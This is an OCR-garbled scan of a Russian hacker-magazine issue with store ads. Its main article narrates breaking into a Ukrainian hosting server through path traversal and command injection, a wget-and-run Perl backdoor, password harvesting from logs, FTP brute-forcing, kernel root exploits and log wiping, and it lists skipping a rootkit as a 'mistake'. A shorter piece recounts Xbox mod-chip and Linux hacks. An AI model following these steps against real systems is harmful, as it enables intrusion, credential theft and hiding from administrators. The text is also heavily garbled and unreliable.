мобильных телефонов, аксессуаров. 



ДОСТАВКА ■ ПРОДАЖА В КРЕДИТ 
СБОРКА КОМПЬЮТЕРОВ НА ЗАКАЗ 




ОПЛАТА В РУБЛЯХ РФ, ДОЛЛАРАХ США И ЕВРО 



Москва 

ѵѵѵѵѵѵ.иіігасотр.ги 
(095) 775-7566 

м. Отрадное 

Юрловский проезд, д. 13 
м. Коломенская 

ул. Коломенская, д. 17 



Санкт-Петербург 

ѵѵѵѵѵѵ.зрЬ.иІІгасотр.ги 
(812) 336-3777 

м. Кировский завод 

ул. Возрождения, д.20А 



Интернет-магазины: 

ѵѵѵѵѵѵ.ІЛТВА-опІіпе.ги 
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ПРИШЛО ВРЕМЯ 

ЗАМЕНИТЬ ВАШИ СТАРЫЕ ПК? 




Программа поощрения постоянных клиентов: шшш.сІиЬ.иІІгасотр.ги 



Іпіеі, логотип Іпіеі, Іпіеі Іпзісіе, логотип Іпіеі Іпзісіе, Іпіеі Сепігіпо, логотип Іпіеі Сепігіпо, Сеіегоп, Іпіеі Хеоп, Іпіеі ЗреесІЗіер, Ііапіит, Репііит и Репііит III Хеоп 
вляются товарными знаками или зарегистрированными товарными знаками корпорации Іпіеі и ее подразделений в США и других странах. 





ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІ|ІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС.20ЫЕ РЕВВІІМ НЬЮСЫ 



Оранжевая 

революция 





УПОРСТВО В ЖИЗНИ — ВАЖНАЯ ШТУКА. ИНОГДА 
БЫВАЕТ ТАК, ЧТО, КАЖЕТСЯ, ВОЗМОЖНОСТЬ ЧТО- 
ТО СДЕЛАТЬ УЖЕ УШЛА, ОДНАКО ЕСЛИ НЕ СДА- 
ВАТЬСЯ И БОРОТЬСЯ ДО ПОСЛЕДНЕГО, ВСЕ МОЖЕТ 
ИЗМЕНИТЬСЯ. ТАК ВО ВСЕМ, И КОМПЬЮТЕРНЫЕ 
ВЗЛОМЫ НЕ ИСКЛЮЧЕНИЕ. СЕГОДНЯ Я РАССКАЖУ 
ТЕБЕ ЗАХВАТЫВАЮЩУЮ ИСТОРИЮ АТАКИ НА ОДИН 
УКРАИНСКИЙ СЕРВЕР, ВО ВРЕМЯ ОСУЩЕСТВЛЕНИЯ 
КОТОРОЙ У МЕНЯ НЕСКОЛЬКО РАЗ ВОЗНИКАЛО 
ЖЕЛАНИЕ ОПУСТИТЬ РУКИ. ОДНАКО УПОРСТВО И 
ВЕРА В СОБСТВЕННЫЕ СИЛЫ ПОЗВОЛИЛИ 
МНОГОГО ДОБИТЬСЯ I ЗазГіікз (ІиЬітоѵѵ@іпЬох.ги) 




Гуманистическая история взлома 
украинского сервера 



[іпіто] Я всегда любил фильмы про хакеров. Еще бы, ис- 
следования крупных сетей, взлом корпоративных сер- 
веров, кража конфиденциальной информации — все 
это действительно завораживает. И вот однажды поз- 
дно вечером я решил немного поиграть в хакеров и по- 
веселиться. Ну что ж, сказано — сделано, іизі Ѳоодіе 
іі! И вот на экране замелькали сотни разных украин- 
ских компаний, но среди прочих мое внимание прив- 
лек сайт какой-то непонятной организации, которая 
торговала то ли солью, то ли дорожным гравием, то ли 
вообще ничем не торговала, точно не помню. Ресурс 
привлек мое внимание тем, что в адресе найденной 
страницы находилась примерно такая строка: 
ѵѵѵѵи/. і ігтазііе . ио/сді-Ып/іпсІех. сді?пе\л/5І : іІе=20050106. Іхі. 
Тут не надо быть компьютерным бизоном, чтобы дога- 
даться: с помощью этого скрипта возможно просма- 
тривать файлы на сервере, а может быть, даже и ис- 
полнять команды. Что ж, попробуем. 

Указав в качестве параметра пешЛІе название одно- 
го из файлов в текущем каталоге, я увидел, что он дей- 



ствительно включился! Тогда я запустил скрипт так: /л- 
сІех.сді?пеѵѵ5І : іІе=../../../../../еТс/рсі55\л/сІ — и передо мной пред- 
стал файл с учетными записями пользователей. 

В принципе пока радоваться особенно было нечему, однако не- 
которые зацепки уже были. Я зашел на свой забугорный шелл и 
просканировал птар'ом удаленный комп в поисках открытых 
іср-портов и доступных сетевых демонов. Конечно, можно было 
сразу подставить вместо имени файла значок пайпа (« I ») и вве- 
сти команду, однако я не хотел спешить. 

Через некоторое время после запуска сканера выяснилось, что 
на ломаемой тачке кроме всего прочего крутится бажный 
РгоРТРй 1.2.9, для которого есть публичный сплойт: ѵѵѵѵѵѵ.зесигіТу- 
ІаЬ.ги/_ехрІоіІ5/рю1 : ірсІ2. с. ТхТ. 

Однако, как я и ожидал, этот эксплойт был не работоспособным 
и не выдал ничего полезного после нескольких минут перебора 
адреса возврата. Можно было, конечно, разобраться, в чем де- 
ло, однако у меня была идея получше. В имя открываемого файла 
я подставил строку I ісі I и тут же на главной странице получил 
убедительный ответ сервера: поЬосІу. Ну что ж, пришло время ре- 
шительных действий. 





Здесь ты можешь найти 
хорошие словари для б ру- 
та. Конечно, только для ис- 
пользования в ознакоми- 
тельных целях. 
ѵѵѵѵѵѵ.раззтгбз.ти/бісМт 
йр://Пр .орептІІ. со т/р и ЬМ 
огбіізіз 

ПрУ/Пр.сегіаз.риг- 
бие.еби/риб/бісі 
Пр://Пр . ох.ас.ик/риЬ/тгб- 
Іізіз 

Йр:Шр . іипеі. Іі/риЬ/ипіх/зе- 

сигііу/бісііопагіез 

шшш.оиірозіѲ.сот/Р- 

Іез/І/ІогбИзізМтІ 

шшш.рРгеак. сот/МтІ/шогб- 

Іізіз.зЫтІ 

ПрУ/соазІ.сз.риг- 

бие.еби/риб/бісі/тгбіізіз 

и/и/ и/. тоЫІзІаг. гиДіІез/бісІ 

Советую тебе посетить сле- 
дующие сайты по безопас- 
ности: 

шшшшЬ-Ііаск.ш 

шшш.гзі.ѵоіб.ги 

ѵѵѵѵѵѵ.дРОзіз.огд 



[внедряемся!] Что у меня было в данный 
момент на руках? Во-первых, сервер не 
был защищен файрволом, что не могло не 
радовать. Во-вторых, я мог просматривать 
файлы и, что самое важное, выполнять ко- 
манды с правами вебсервера. Итак, впе- 
ред с песней. 

Была отдана команда I и /деі Шр://Ііо5і.ги 
/ЬсІ.рІ -О /Ттр/ЬсІ.рІ;регІ /Ітр/Ьсі.рі I , по- 
сле чего на тачке, как и предполагалось, 
открылся всеми любимый перловый бэк- 
дор на порту 37900. 

Подключившись к этой оболочке, я решил 
осмотреться в системе. Как я уже сказал, в 
системе мои права были, собственно, ни- 
какими (побосіу), и поэтому первая моя 
цель заключалась в том, чтобы получить ста- 
тус какого-то активного системного пользо- 
вателя и в дальнейшем поднять рутовые при- 
вилегии. Результат выполнения первой ко- 
манды ипате -о уже ничего хорошего не 
сулил — ядро было новой версии 2.6.10 и 
уязвимо только для недавно вышедшего эк- 
сплоита еІНЫ (ѵѵѵѵѵѵ.ѵѵеЬ-Ііоск.ги/ехрІоіі 
/5оигсе/еІШ_ѵ108.с). К сожалению, со- 
брать эту отмычку удается не на всех маши- 
нах, и именно в данной системе сплойт не 
принес ожидаемого результата :(. Сначала 
я немного расстроился, но пока что не ду- 



• < На нашем диске ты най- мал сдаваться. Первое, что пришло на ум — 

дешь полные версии про- пропарсить доступные на чтение файлы, в 
грамм, описанных в этой которых пользователи, возможно, записали 

статье. пароли. Но найти ничего не удалось. Инте- 

ресно, что на винте находилось много па- 
пок с домашними страничками разных фирм. Оказывается, я ломал сайт не ка- 
кой-то убогой конторы, а целого хостера. Подняв іІюопИд, я увидел, что на маши- 
не стоят три адаптера, хотя два из них функционировали в пределах одной се- 
ти. Решено было запустить птар в бэкграунде (к счастью для взломщика, была 
установлена не самая старая версия). Пока сканер работал, я продолжал 
свою миссию. Решено было просмотреть логи Апача. Уж что-что, а хоть это до- 
ступно для чтения. Скомандовав соі /роіІі_іо_оросІіе_Іод5/оссе55_Іод.х I дгер 
ро 55 I , я ожидал получить все строки из логов вебсервера, где есть вхождение 
ра55, и не прогадал — уже в четвертом журнале я наткнулся на такую запись: 



7аиШ=1&Іодіп=тогсІа&ра55ѵѵогсІ=%27%2СЫаЫа%2СР/о27 

Конечно, была вероятность, что лабуда, идущая после роззѵѵогсі, подойдет в 
качестве системного пароля к учетной записи тогсіа. Но сначала надо бы- 
ло эту строчку привести к стандартному виду. Делается это элементарной 
рПр-функцией игІсІесосІеО, которой передается декодируемая строка. Так я 
получил предполагаемый пароль и, скрестив пальцы, попробовал подклю- 
читься по 55 П на сервер. И что я увидел? 

[Иаскег іпзісіе] Нет, меня не послали на фиг надписью «АиіПепіісаііоп Таі- 
Іеб»! Передо мной появилось стандартное приглашение ЬазП, и это озна- 
чало, что теперь у меня есть доступ к системе из-под полноценного поль- 
зователя тогсіа. Примечательно, что команда сс/ ~ возвращала не в /Ііо- 
те/тогсіа, а на каталог выше. Папки чужих юзеров просмотреть не уда- 
лось, поэтому я перешел в директорию тогсіа. В папке находились толь- 
ко наброски \л/еЬ-страничек, ЗР2 на винду, какие-то прайсы. Не нашлось 
.Ьа5Іп_НІ5Іогу — он попросту отсутствовал. Помнишь, я наткнулся на ката- 
лог с сайтами различных организаций? Так вот, некоторые из них принад- 
лежали юзеру тогсіа. Перед исследованием /кюте/ІіТТрсІ (именно там 
лежали странички) я залил в папку /Ттр/.Ьаскир брутфорсер Пурга с 
официального сайта и /ѵѵѵѵ.іііс.огд. И, конечно, солидный словарь (рус- 
ские слова в английской раскладке). Оставалось собрать список поль- 
зователей с валидными шеллами. Как водится, на хостинге было много 
учетных записей, у которых интерпретатор отсутствовал, и мне они были 
совершенно не нужны. Я заюзал скрипт, который и доставал учетные за- 
писи, его элементарный код приведен на врезке. Я добыл имена пользо- 
вателей и натравил гидру на локальный РТР в надежде получить еще ка- 
кие-нибудь пассы. Причем замечу, что скрипт записывает пару логин:ло- 
гин, что удобно только в том случае, если надо быстро (обычно удаленно) 
подобрать пароль. Это особенно эффективно, когда в ра55\л/Р хранится 
много учетных записей. Ведь та же гидра с опцией -е л $ подбирает па- 
роль, равный логину, и пустой пароль. Впрочем, можешь использовать 
перловый скрипт Форба, они аналогичны в этом :). 



[СКРИПТ для 
ВЫТЯГИВАНИЯ 

логинов 

ИЗ РАЗЗѴѴй] 

<? 

$а=Ьреп("раз5ѵѵсІ.ІхГ,г); 
Определяем файл с учет- 
ными записями 
ѵѵЫІе(!Іео{($а)) 

{ 

$з1Мде1з($а); 
іI(з^^ро5($5^^,7Ьа5І^ ,, ) ==іше 
) #работаем со строкой в 
которой есть "/ЬазИ" 

{ 

есГіо "$зіг <Ьг>" ; 



$ех=Іореп("Іодіпз.іхі",а); 

$роз=5Ігроз($зІг,":"); 

$ѵѵгі*е=5иЬ5{г($5іг,0,$ро5); 

ІриІз($ех,"$ѵѵгіІе:$ѵѵгіІе \п"); 
#если нужно, чтобы 
скрипт записывал только 
логины, - убрать вторую 
переменную и двоеточие 
*сІозе($ех); 

} 

еІзе{} 

} 

^сІозе($а); 

?> 



Теперь с чистой совестью я полез в /Ііоте/ШрсІ. Там 
было несколько папок вида ѵѵѵѵѵѵ.тадх.ЬоІсІо.ио, где 
лежали \л/еЬ-страницы, которые можно было смотреть 
и редактировать. Я быстренько просмотрел эти папки, 
и тут мое внимание привлек файл осітіп.ріір. Правиль- 
но, это скрипт администрирования сайта, но пароля 
внутри, естественно, не было — скорее всего, он чи- 
тался из базы данных. Однако я поторопился: в рас- 
сматриваемом сценарии инклудился файл зеі.ріір, в 
котором был жестко прописан админский логин с па- 
ролем. Как говорит моя финская подружка, «прик-коти- 
ится» :). Однако не пригодился, поскольку найденный 
аккаунт не подошел в качестве системного. 

Тем временем птар (который я запустил еще под по- 
Ьосіу) закончил сканировать подсеть и записал отчет 
в /Ттр. Отчет был весьма любопытный. В сети находи- 
лось очень много компов. Что примечательно, адми- 
нистратор был настоящим зоофилом: все свои маши- 
ны он называл различными животными. Так, среди 
нескольких десятков тачек были тигры, лошади, волки 
и слоны. Но больше всего меня проперло с хоста, ко- 
торый жил с именем ЬиП :). То ли админ был не дурак 
побухать, то ли просто он имел в виду слово ПиЬ нао- 
борот, даже не знаю. Такой вот наркоман. 

Это все было, конечно, весело, но был ли повод для ве- 
селья? Получить абсолютный доступ пока не удава- 
лось, и поэтому лучшее решение на тот момент со- 
стояло в том, чтобы замести все следы и быстренько 
свалить из системы на время — в соседней консоли 
неожиданно объявился рут, и палить себя раньше вре- 
мени не было смысла. Кроме того, мне хотелось спать, 
и поднимающееся из-за горизонта солнце уже начало 
освещать верхушки самых высоких домов. Я решил 
вздремнуть, а завтра продолжить изучение локалки. 

[Ьашау!] Следующим же вечером я вернулся на взло- 
манную тачку. Ничего не изменилось — даже забытый 
в спешке бэкдор так и оставался висеть на месте. Я 
подумал, что админ, по-видимому, раздолбай и курит 
на работе бамбук. Это в дальнейшем и стало моей 
главной ошибкой. Ближайшим в подсети по адресу 
был хост іідег.ЬаІсІо.иа. Подключившись к нему по 55П, я 




[в принципе, такой файл никаких подозрений не вызывает] 



[хакер 04 [76] 05 049 ] 





[хакер 04 [76] 05 050 ] 




[звезда скрипткидничества — г57 рИрзИеІІ] 



убедился в том, что и на этой тачке был пользователь тогсіа с из- 
вестным мне паролем. Я попал в систему, и первое, что я скоман- 
довал, было, естественно, ипате -е. Вот это да, повезло так повез- 
ло! Тачка работала под линуксом с ядром 2.4.20, которое дыря- 
вое, как дуршлаг моей бабушки. Напомню, что это ядро уязвимо 
для множества эксплойтов, например тгетар и бо_Ьгк. Обе от- 
мычки можно скачать с ѵѵѵѵѵѵ.ѵѵеЬ-Ііаск.ги. Сначала я решил по- 
пробовать тгетар (ѵѵѵѵѵѵ.ѵѵеЬ-Ііаск.ги/ехрІоіТ/зоигсе/кегпеІппге- 
тар.с ). С компиляцией и запуском проблем не было, но вот неза- 
дача — гадская программа была не совсем работоспособной и 
вместо рутового шелла выполнила ріпд. Конечно, можно было 
найти рабочий сплойт, но я решил попробовать бо_Ьгк (мѵи/.и/еЬ- 
Ііаск. ги/ехріоіі/зоигсе/кіаіогікіапіо. с) . Собрав сплойт с флагом - 
зТаТіс (иначе вывалится Зедтепіаііоп Раиіі), я выполнил ./а.оиі. И 
тут мне наконец-то улыбнулась удача, и система была взломана! 
В награду появилось приглашение 50, и ісі стал равен нулю. Стоит 
ли говорить, как сильно меня обрадовало это обстоятельство! 
Теперь я был рутом. Мне стало наплевать на свою личную безопас- 
ность. Содрав с сервера /еіс/зкіасіоѵѵ, я решил не заморачиваться 
на тему бэкдора или руткита. Еще бы, администратор так пассивно 
себя вел, что можно было не бояться потерять свои привилегии. 
Действительно — на соседней тачке (с которой я, собственно, и на- 
грянул) крутился незамеченный до сих пор перловый бэкдор, на 
сайте хостера присутствует бажный сценарий, через который 
можно исполнять команды. Тем более что файл с хешами юзеров 
был у меня в лапах, и я был уверен, что іоОп ІТіѳ гіррег справится с ни- 
ми быстро. Довольный собой, я бегло просмотрел директории 
пользователей и, решив, что на сегодня хватит, подумал, как бы по- 
быстрее удалиться. На скорую руку в /Ттр/ была создана папка 
1ю6245, в нее я засунул откомпилированный бинарник эксплоита и 
простенький бэкдор. Скачав с сайта \ллллл/. гзі. ѵоісі. ги логклинер зіе- 
аІТІг я почистил журналы и отправился на боковую. Тем временем 
подобрался пароль юзера тіко. 

[админ наносит ответный удар] Через пару дней, довольный со- 
бой, я решил зайти по ззкі на недавно взломанный Тідег.Ьаісіа.иа. И 
что же? Мне предложили пройтись лесом. ѴѴПаі ІТіе Июк? Что слу- 
чилось, почему не пускают? Быстренько просканив эти две маши- 
ны с шелла, я увидел, что 22 порт везде фильтруется. Я зателнетил- 
ся на перловый бэкдор на еіеІ'апі.ЬаІсІа.иа — соппесііоп геТизесІ! 
Бэкдор убили. Ну ничего — есть страница с бажным іпсіех.сді. Я 
набрал адрес и/и/іѵ./угтз/Те.і/а и увидел, что никакого іпсіех.сді нет 
и в помине! Вместо бажного сценария красуется ііет_Ьосіу.ркір, 




[админ-наркоман проявил компетентность и закрыл 22 порт для 
внешнего доступа] 



который уже не открывает системные файлы и, тем более, не вы- 
полняет команды. Все закрыли, все бреши заделали? 

Я был чрезвычайно недоволен собой и зол не столько на админа, 
сколько на самого себя. Ну чего стоило поставить полноценный 
руткит в систему? 

Казалось бы, что тут делать. И тут меня осенило — пароли к ад- 
минскому интерфейсу сайта! Все-таки правы финны, «прик-ко- 
ти-ились» :). Я зашел на официальный сайт провайдера (имен- 
но этот сайт хостился на іідег.Ьаісіа.иа), зашел в админку и 
ввел украденный пароль. Скрипт, слегка скрепя, пустил в глав- 
ное меню управления сайтом. Быстро оглядевшись, я зашел в 
меню Файлы -> Загрузить. И закачал на сервер обычный рБр- 
зОеІІ. С помощью него забиндил порт с ЬазБ и зашел в систему. 
Там практически ничего не изменилось, по-прежнему работа- 
ло убогое ядро ветки 2.2. Только вот директорию с бинарным 
сплойтом админ потер, а юзера поЬобу зачем-то припихнул в 
группу с БД огасіе — наверное, чтобы удобнее было тырить ба- 
зы данных ;). Заново скачать БаіогіБапго и добиться рута не со- 
ставляло труда. 

Последний ход оставался за мной. Но я не хотел просто затроя- 
нить тачку и оставить ее для дальнейшего продвижения по сетке, 
во мне играла злоба на админа — он негодяй и выпер меня из си- 
стемы :). Но потом я подумал, что вообще, какое я право имею 
вторгаться на его законную территорию и устанавливать свои 
правила. Нет уж, давайте жить дружно. 

[гесІетТріоп] За окном медленно поднималось солнце. Я сидел и 
думал над письмом администратору, в котором наиболее полно 
попытался объяснить и показать уязвимые места системы. Эта ис- 
тория научила меня, что никогда нельзя недооценивать системно- 
го администратора, нужно быть внимательным и учитывать все 
окружающие обстоятельства. Чего и тебе желаю. Удачи :). 

Р.З. Эта история вполне реальна и имела место быть на Украине. 
Из собственных соображений настоящие доменные имена сер- 
веров заменены © 




[МОИ ОШИБКИ] 

После тщательного анализа приведу мои основные ошиб- 
ки, из-за которых я временно потерял доступ к системе: 
Ир] Никогда нельзя оставлять надолго простой запущенный 
бэкдор, так как он крутится в процессах и светит порт, и 
его легко можно попалить при помощи команд рз иах или 
пеѣІаТ-ап. Большая вероятность, что процесс заметят. 

Ш Я недооценил возможностей системного администра- 
тора и был слишком самоуверен. В большинстве случаев 
админы компетентны и опытны, просто немного несо- 
бранны и ленивы. Как видишь, он довольно шустро заме- 
нил бажный скрипт на сайте, убил бэкдор и сменил пользо- 
вательские пароли. Правда, почему-то не обновил ядро - 
но я склонен списывать это на природную леность :). 

Щ Когда я получил абсолютные привилегии в системе, я 
поленился установить руткит, который позволил бы мне 
остаться незамеченным. 






Компьютеры НР на базе МісгозоІІ® \МпсІоѵѵ5® ХР Рго^еззіопаІ. 
Предложение так горячо, что все раскупается вмиг. 



Компьютеры НР Сотрар 6x2000 с низкой себестоимостью созданы специально для бизнеса. Строгие процедуры 
тестирования и проверки НР гарантируют высокую надежность и низкие затраты на эксплуатацию в течение всего 
жизненного цикла. Компактные расширяемые компьютеры НР Согпрар 6x2000 оснащены всеми необходимыми 
компонентами и обеспечивают неизменно высокий уровень качества и обслуживания. Благодаря стильному 
и компактному корпусу Місгоіоѵ/ег, их можно установить в любом офисе: они будут работать на столе, на полу или 
там, где вы захотите. Если вам нужна максимальная отдача от инвестиций в ИТ, выбирайте продуктивные и доступные 
компьютеры НР. 
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НР СОМРАО ВІІ5ІІЧЕ55 РЕ5КТОР 
0X2000 (РЕ006ЕА) 



Простые недорогие ПК для бизнеса. 



от 



17 655 



руб. 

рекомендованная цена 



• Процессор ІпіеІ® Сеіегоп® 0-325 2,53 ГГц 

• ОС: МісгозоГі® ѴѴіпсІоѵ/$® ХР РгоГеззіопаІ 

■ Оперативная память: 256 МБ РС3200 

■ Жесткий диск: 40 ГБ (7200 об/мин) 

■ Оптический привод: СО-РОМ 48х 
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Забей гвоздь 
в ящик Билла 

СОВРЕМЕННЫЕ ИГРОВЫЕ ПРИСТАВКИ ДАЛЕ- 
КО ЭВОЛЮЦИОНИРОВАЛИ ОТ СВОИХ ПЕР- 
ВОБЫТНЫХ ПРЕДКОВ. ОНИ УЖЕ МАЛО НА- 
ПОМИНАЮТ ДЕТСКУЮ ИГРУШКУ, А ПО 
СВОИМ ХАРАКТЕРИСТИКАМ СРАВНИМЫ 
С ПК. СЕГОДНЯ ОНИ РАБОТАЮТ НА ТЕХ ЖЕ 
ПРОЦЕССОРАХ, ГРАФИЧЕСКИХ ЧИПАХ, ЧТО 
И ОБЫЧНЫЕ КОМПЫ, ИМЕЮТ ЖЕСТКИЕ ДИ- 
СКИ И УМЕЮТ ВЫХОДИТЬ В ИНТЕРНЕТ. ВСЕ 
ЭТО В СОВОКУПНОСТИ НАЧИНАЕТ ПРИВЛЕ- 
КАТЬ К КОНСОЛЯМ ВСЕ БОЛЬШЕЕ ЧИСЛО 
ЛЮДЕЙ, НЕ ТОЛЬКО ИГРАЮЩИХ, НО И ОДЕР- 
ЖИМЫХ СПЕЦИФИЧЕСКОЙ МАНИЕЙ ИССЛЕ- 
ДОВАНИЯ, НЕ ЖАЛЕЮЩИХ ВРЕМЕНИ И СИЛ 
НА УСОВЕРШЕНСТВОВАНИЕ СВОЕЙ ЛЮБИ- 
МОЙ ПРИСТАВКИ. И КОНЕЧНО, ХАКЕРЫ НЕ 
МОГЛИ ОСТАВИТЬ БЕЗ ВНИМАНИЯ ПРО- 
ДУКТ, ВЫПУЩЕННЫЙ САМОЙ МІСРЮЗОРТ :). 

В ОБЩЕМ, СЕГОДНЯ Я РАССКАЖУ ТЕБЕ ИС- 
ТОРИЮ О ТОМ, КАК ЛОМАЛИ И ЛОМАЮТ 

ПРИСТАВКИ ХВОХ I РоззотаЬсгаг (гоз5отаЬааг@таіІ.ги) 



Истории взломов приставки 
ХЬох от МісгозоК 

[хЬох- нѳ бумбокс!] Если игровые качества ХЬох не мо- 
гут вызвать никаких нареканий, то мультимедийные воз- 
можности, мягко говоря, разочаровали первых покупате- 
лей ящика: поддерживаются только форматы АисІіо-СО и 
видео на ОУО (и то если приобрести дополнительный де- 
вайс примерно за 50 гринов). В мае 2002-го в Сети появи- 
лись слухи о появлении медиаплеера для ХЬох'а, но его 
первая, еще сырая версия появилась в следующем ме- 
сяце на сайте хЬохсІеѵ.оіІі.сх. Его разработчиками были 
РІЛМТІМЕ и сІ703д4д — двое энтузиастов, осуществивших 
в своем ХЬох Месііа РІауег'е возможность перекодировки 
видеоформатов ЭіѵХ и ѴісІеоСО во внутренний формат 
130, в котором представляются данные в приставке. В 
дальнейшем в плеер включаются популярные аудиоко- 
деки МРЗ и АСЗ. 

И все было бы отлично, если не одно «но»: програм- 
ма не будет работать на приставке, так как Місго- 
зоІЧ позаботилась о том, чтобы в ее консоли не мог 
работать софт, создатели которого не отстегнули 
компании некоторую сумму зеленых президентов. 
Вообще, МІСГ050І4 внес в ВІОЗ коробки целую кучу 



Если тема модификации 
игровых приставок тебе 
интересна, советую 
посетить следующие сайты: 
Шр://датег-ги.пагоб.ш 
Шр://дате24.т 
Шр;//хЬох.ш. 

Там есть масса отличных 
иллюстрированных 
материалов и прекрасные 
форумы, где можно 
получить ответ почти на 
любой вопрос. 



фишек, ограничивающих запуск несертифицированных про- 
грамм, дисков-копий, дисков других регионов и т.п. Со времен 
РІаузТаТіоп такую защиту преодолевают способом модифика- 
ции приставки специальным тоб-чипом, снимающим барьеры 
закрытой архитектуры. 

[модификация Х-коробки] Ассортимент чипов для Иксбокса ве- 
лик, самыми популярными чипами быстро стали Хіепбег и Мез- 
зіаЬ, затем появились ЕпідтаЬ-Х и Х-есыіег. Первоначально це- 
на на такие чипы была довольно высока и доходила до восьми- 
десяти у.е. Для установки мод-чипа необходимо было при- 
паять к системной плате некоторое количество проводов. Та- 
кие действия лишали владельца консоли права на гарантий- 
ное обслуживание ящика, но настоящих хакеров это, конечно, 
не останавливало ;). Как проделать самостоятельную установ- 
ку мод-чипа, в подробностях писали на сайтах ѵѵѵѵѵѵ.хТепсІег.іп- 
1о, и/и/и/. сЫпа-теззаіІі. сот, и/и/и /.епідтаіі.соіп, там же можно 
было и приобрести эти чипы. 

Продажи мод-чипов совсем не устраивали МісгозоІТ, ударяя 
по ее карману. Ведь цена ХЬох'а всегда была ниже ее себе- 
стоимости: первоначальные $300 постепенно снизились до 
двух сотен баксов. Понятно, что прибыль мелкомягкие плани- 
ровали получать с продаж игр, а массовая продажа мод-чи- 
пов грозила большими убытками, нанесенными распростра- 
нением пиратского софта. Активная борьба компании против 
распространителей мод-чипов особых успехов не имела, раз- 
ве что в Западной Европе, где удалось законодательно запре- 
тить их продажу. Здесь показательна история с сайтом Епід- 
то/і.сот, который просуществовал всего месяц после нача- 
ла продаж тоб-чипа ЕпідтаЬ-Х и прекратил свою деятель- 
ность под давлением Майкрософта. Впрочем, свою работу по 
разработке новых чипов энигмовцы не остановили, написав об 
этом на своей паге. 

Примерно в августе 2002-го появляется тоб-чип Х-есиіег, кото- 
рый наряду с обычными функциями, присущими нормальному 
модификационному чипу, имел специфическую особенность — 
переключатель оп/оІЧ. Кроме того, был значительно упрощен 
процесс установки — нужно было припаять к плате всего де- 
вять проводов, когда у других чипов число проводов доходило 
до двадцати девяти. Причиной появления выключателя стали 
слухи, ходившие по Сети, о том, что планируемый сервис для 
игр в режиме опііпе будет иметь систему распознавания моди- 
фицированных приставок. 

15 ноября онлайновый сервис ХЬох Пѵе был запущен, и опасения 
владельцев приставок с мод-чипами полностью подтвердились — 
чипованные приставки выявляются и заносятся в черный список, 
но об этом чуть позже, а сейчас я расскажу об одном интерес- 
ном хаке ящика. 

[зачем ждать целый год?] Действительно, зачем? А ведь с момен- 
та появления в продаже Х-Вох'а до появления сервиса ХЬох Пѵе 
прошло больше года! 

«Непорядок! Что за фигня?» — подумали двое хакеров Тгаг и 
Рооіу, подумали и решили немного поисследовать свои боксы X. 
Результатом их непродолжительного исследования стала прог- 
рамма ХЬох 0аіеѵ\/ау, работающая на ПК под ОС Ппих и переда- 
ющая пакеты, исходящие из ЕіЬегпеНпорта приставки через ин- 
тернет. Программа произвела настоящий фурор на онлайн-ту- 
совке ЗІазЬсІоі. Около семи тысяч человек скачали ее за первые 
четыре дня. Правда, возможности программы весьма ограниче- 
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[сайт с кучей разнообразных мод-чипов. Стоят до $25] 



ны: она позволяет объединиться для игры по интернету лишь четы- 
рем игрокам, но поскольку все это произошло за год до появле- 
ния ХЬох І_іѵе, то и игр, поддерживающих большое количество иг- 
роков, тогда еще просто не было :). 

Ну а тех, кто ждал целый год, заплатил полтинник зеленью за ПО 
для подключения к онлайн-сервисам, подключился к сети ХЬох 
І_іѵе, при этом забыв отпаять свой мод-чип, или, если есть выклю- 
чатель, случайно забыв отключить его, ждало в Сети не удоволь- 
ствие от игры по интернету, а облом в виде скачанного апдейта, 
автоматически запускаемого приставкой, который тестировал 
ее на наличие мод-чипов и нелицензионного ПО и при их нахож- 
дении заносил уникальный идентификационный номер пристав- 
ки в бан-лист в базе данных Місгозоіі. Приставкам, попавшим в 
этот черный список, навсегда закрывался доступ к сервису 
ХЬох Пѵе. Впрочем, смена идентификационного номера — за- 
дача вполне решаемая. 

За месяц до этого Майкрософт выпустил новую модификацию 
ХЬох'а, так называемый ХЬох 1.1. Помимо снижения себестои- 
мости консоли, целью данного шага мелкомягких было созда- 
ние ряда препон для желающих оснастить свою коробку тоЬ- 
чипом. Для этого была заменена ВІОЗ, некоторые изменения 
претерпело ПО. И вот в Сети запестрили сообщения о том, что 
ни один существующий мод-чип не работает на обновленной 
коробке. 

Но тут за дело взялись настоящие профессионалы — участники 
проекта ХЬох Ппих Ргоіесі. Всего в недельный срок им удалось 
выявить ошибку в механизме шифрования РОМ-микросхемы, ко- 
торая проверяет ВІОЗ на наличие изменений, то есть выявляет 
мод-чип. Ими было обнаружено, что криптографический алго- 
ритм новых консолей никак не реагирует на изменения, внесен- 
ные в 32 и 64 биты блока дешифруемых данных. Использование 
данной уязвимости позволило запускать на консоли любое ПО, 
хранящееся в оперативке, причем безо всякой модификации! 
Остается только посмеяться над усилиями Майкрософта по 
борьбе с хакерами. 



[пингвин в коробке] А теперь — самый, пожалуй, интересный взлом, 
идея которого витала в воздухе еще до выпуска ХЬох'а, — это 
установка на коробке ОС Ппих. Был ХЬох Белый — стал ІіпиХ- 
Ьох Серый. 

Сама идея портирования Линукса в коробку поначалу казалась 
неосуществимой. Даже при наличии мод-чипа, а при его отсут- 
ствии — вообще фантастической. Сперва работы в этом напра- 
влении велись вяло, трудились настоящие энтузиасты, количество 
которых было весьма ограничено. Под сомнение ставилась и 
практическая польза от установки Линукса. 

Но вот в мае 2002-го стартует открытый проект ХЬох Ппих Ргоіесі, 
и ситуация начинает быстро меняться, все больше людей про- 
никается идеей превращения приставки в полноценный ком- 
пьютер. А всеобщее внимание этот проект получил в июле, ког- 
да некий человек, личность которого скрывалась от публики, но 
была известна организаторам проекта, пообещал выплатить 
200 тысяч баксов за решение задачи по переносу Линукса на 
ХЬох. Причем эти деньги были поделены на две равные части: 
первая выплачивалась за установку Линукса на аппаратно мо- 
дифицированную консоль, то есть с использованием мод-чипа, 
вторая — за установку без какой-либо модификации. При этом 
был установлен лимит времени на осуществление этой задачи — 
до конца года. 

5 сентября стал красным днем в календаре для участников 
проекта — на коробку удалось установить ЗиЗЕ Ппих 8, о чем 
сообщалось на сайте проекта. Там же приводились подроб- 
ные инструкции по установке, суть которых состояла в незначи- 
тельном редактировании дистрибутива, где изменялось нес- 
колько строк в ядре и добавлялись новые драйвера. Таким об- 
разом, подсоединив к модифицированной консоли мышь и кла- 
ву, владельцы приставок разом превращались во владельцев 
персоналок. Первые сто тысяч были честно разделены между 
авторами самых интересных решений по установке Ппих (тако- 
вых оказалось несколько). 

Вторая часть задачи оказалась до конца года нерешенной. Но 
конкурс был продлен еще на год, кроме того, неизвестный спон- 
сор решил открыть свою личность. Им оказался глава компании 
